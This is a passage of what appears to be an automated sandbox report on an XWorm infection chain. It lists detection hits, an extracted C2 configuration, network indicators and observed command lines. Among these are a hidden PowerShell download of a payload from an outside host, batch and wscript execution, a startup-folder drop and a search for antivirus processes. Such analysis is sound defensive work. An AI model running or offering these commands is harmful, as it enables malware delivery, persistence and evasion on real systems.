C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 4984, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7960, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 5900, ProcessName: Carter.pif

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 5900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 7416, ProcessName: RegAsm.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 6508, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 7960, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 6756, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 4984, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2716, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 6756, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7960, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6464, ProcessName: findstr.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T09:51:15.726461+0100	2852870	1	Malware Command and Control Activity Detected	87.120.117.152	7007	192.168.2.5	49996	TCP
2024-12-10T09:51:45.726380+0100	2852870	1	Malware Command and Control Activity Detected	87.120.117.152	7007	192.168.2.5	49996	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T09:51:15.726461+0100	2852874	1	Malware Command and Control Activity Detected	87.120.117.152	7007	192.168.2.5	49996	TCP
2024-12-10T09:51:45.726380+0100	2852874	1	Malware Command and Control Activity Detected	87.120.117.152	7007	192.168.2.5	49996	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T09:51:12.000071+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.5	49996	87.120.117.152	7007	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://myguyapp.com/msword.zip	Avira URL Cloud: Label: malware
Source: https://myguyapp.com/msword.zip#.	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Sample uses string decryption to hide its real strings

Source: 24.3.Carter.pif.426ba60.0.raw.unpack	String decryptor: me-work.com
Source: 24.3.Carter.pif.426ba60.0.raw.unpack	String decryptor: 7007
Source: 24.3.Carter.pif.426ba60.0.raw.unpack	String decryptor: <123456789>
Source: 24.3.Carter.pif.426ba60.0.raw.unpack	String decryptor: <Xwormmm>
Source: 24.3.Carter.pif.426ba60.0.raw.unpack	String decryptor: USB.exe

Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.5:49711 version: TLS 1.2

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000023.00000000.3826513550.0000000000682000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.24.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000023.00000000.3826513550.0000000000682000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.24.dr

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_004062D5 FindFirstFileW,FindClose,	14_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00402E18 FindFirstFileW,	14_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	14_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	24_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,	24_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	24_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	24_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	24_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AECD14 FindFirstFileW,FindClose,	24_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	24_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	24_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	24_2_00AEFA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00284005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00284005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_0028C2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028494A GetFileAttributesW,FindFirstFileW,FindClose,	32_2_0028494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028CD14 FindFirstFileW,FindClose,	32_2_0028CD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	32_2_0028CD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0028F5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0028F735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_0028FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00283CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00283CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49996 -> 87.120.117.152:7007
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.117.152:7007 -> 192.168.2.5:49996
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 87.120.117.152:7007 -> 192.168.2.5:49996

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: me-work.com

Source: global traffic

TCP traffic: 192.168.2.5:49996 -> 87.120.117.152:7007

Source: Joe Sandbox View	ASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
Source: Joe Sandbox View	ASN Name: QUICKPACKETUS QUICKPACKETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

24_2_00AF29BA

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: myguyapp.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
Source: global traffic	DNS traffic detected: DNS query: me-work.com

Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: msword.exe, 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 0000000E.00000000.2551149578.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.12.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.12.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: RegAsm.exe, 00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000020.00000002.2658129274.00000000002E9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000022.00000000.2721397861.00000000002E9000.00000002.00000001.01000000.00000011.sdmp, Missouri.14.dr, Carter.pif.15.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
